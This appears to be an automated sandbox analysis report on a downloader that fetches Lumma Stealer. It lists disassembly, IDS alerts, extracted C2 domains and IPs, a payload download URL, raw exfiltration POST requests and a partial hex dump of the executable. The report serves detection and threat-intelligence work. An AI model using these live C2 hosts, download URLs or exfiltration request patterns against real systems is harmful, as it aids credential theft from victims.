Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	4_2_020EF507
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	4_2_020DC59B
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	4_2_020F25E7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	4_2_02112A17
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, edx	4_2_020DBA6C
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	4_2_020FDA97
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	4_2_020E9AA7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	4_2_0210BAD7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov edx, ecx	4_2_0210BAD7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_020EBAE9
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	4_2_020E7AE4
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov edx, ecx	4_2_020E7AE4
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_020EAB67
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	4_2_020F6BA7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	4_2_020E8809
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then push edi	4_2_0210C807
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	4_2_0210C807
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	4_2_020D7887
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	4_2_020D7887
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	4_2_020FB8B5
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	4_2_020E58FA
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_02110E12
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_020FEE08
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	4_2_020FBE07
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_020FEE1A
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	4_2_020EBE2C
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ebx, edx	4_2_020FDE57
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	4_2_02112F87
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then test esi, esi	4_2_0210CC07
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then jmp eax	4_2_02111C3E
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_020DAC99
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_020FECC9
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ebx, eax	4_2_020D5D17
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ebp, eax	4_2_020D5D17
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_020E6D15
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	4_2_020F5D57
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_020FBD67
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_020EBD88
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_020EAD91
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_020FEDC6

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49768 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49768 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49775 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49785 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49775 -> 104.21.80.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: skidjazzyric.click
Source: Malware configuration extractor	URLs: handscreamny.shop
Source: Malware configuration extractor	URLs: femalsabler.shop
Source: Malware configuration extractor	URLs: versersleep.shop
Source: Malware configuration extractor	URLs: apporholis.shop
Source: Malware configuration extractor	URLs: crowdwarek.shop
Source: Malware configuration extractor	URLs: chipdonkeruz.shop
Source: Malware configuration extractor	URLs: robinsharez.shop
Source: Malware configuration extractor	URLs: soundtappysk.shop

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 09 Jan 2025 07:33:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 09 Jan 2025 07:30:02 GMTETag: "53600-62b40f23d5dfc"Accept-Ranges: bytesContent-Length: 341504Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a f6 05 ca 1e 97 6b 99 1e 97 6b 99 1e 97 6b 99 a3 d8 fd 99 1f 97 6b 99 00 c5 ef 99 3b 97 6b 99 00 c5 fe 99 00 97 6b 99 00 c5 e8 99 64 97 6b 99 39 51 10 99 1d 97 6b 99 1e 97 6a 99 6d 97 6b 99 00 c5 e1 99 1f 97 6b 99 00 c5 ff 99 1f 97 6b 99 00 c5 fa 99 1f 97 6b 99 52 69 63 68 1e 97 6b 99 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab 7f f3 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 50 01 00 00 00 00 00 a5 5e 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 3f b1 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 2a 04 00 28 00 00 00 00 d0 04 00 68 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 47 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 23 04 00 00 10 00 00 00 24 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e4 86 00 00 00 40 04 00 00 60 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 bc 00 00 00 d0 04 00 00 ae 00 00 00 88 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 172.67.179.207 172.67.179.207
Source: Joe Sandbox View	IP Address: 176.113.115.19 176.113.115.19
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49768 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49775 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49785 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49796 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49753 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49803 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49743 -> 172.67.179.207:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IXR9MAB3HR1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12797Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q9BBMBC4NCEVW7NWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15059Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G572QW358N4UW5IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20378Host: skidjazzyric.click

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 2_2_004029EA InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_004029EA

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: post-to-me.com
Source: global traffic	DNS traffic detected: DNS query: skidjazzyric.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click

Source: fuk7RfLrD3.exe, 00000002.00000003.1410298623.000000000073B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/0
Source: fuk7RfLrD3.exe, fuk7RfLrD3.exe, 00000002.00000003.1410298623.000000000073B000.00000004.00000020.00020000.00000000.sdmp, fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, fuk7RfLrD3.exe, 00000002.00000002.3827842898.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: fuk7RfLrD3.exe, 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE
Source: fuk7RfLrD3.exe, 00000002.00000003.1410298623.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe:C7
Source: fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeU
Source: fuk7RfLrD3.exe, 00000002.00000003.1410298623.000000000073B000.00000004.00000020.00020000.00000000.sdmp, fuk7RfLrD3.exe, 00000002.00000002.3827842898.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exec
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microX-z
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: fuk7RfLrD3.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: fuk7RfLrD3.exe, 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE1
Source: fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEd
Source: fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEf-
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/(
Source: D1F3.tmp.exe, 00000004.00000003.1470515175.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000002.1713185017.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1483906938.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1470135683.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/api
Source: D1F3.tmp.exe, 00000004.00000003.1470135683.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/apie
Source: D1F3.tmp.exe, 00000004.00000003.1470515175.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/apirUQ(e/
Source: D1F3.tmp.exe, 00000004.00000003.1483638322.0000000002E2D000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000002.1713205915.0000000002E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click:443/api
Source: D1F3.tmp.exe, 00000004.00000003.1470167292.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1470253492.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click:443/apil
Source: D1F3.tmp.exe, 00000004.00000003.1472031699.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D1F3.tmp.exe, 00000004.00000003.1472031699.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: D1F3.tmp.exe, 00000004.00000003.1472031699.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: D1F3.tmp.exe, 00000004.00000003.1472031699.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: D1F3.tmp.exe, 00000004.00000003.1472031699.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: D1F3.tmp.exe, 00000004.00000003.1472031699.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: D1F3.tmp.exe, 00000004.00000003.1472031699.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
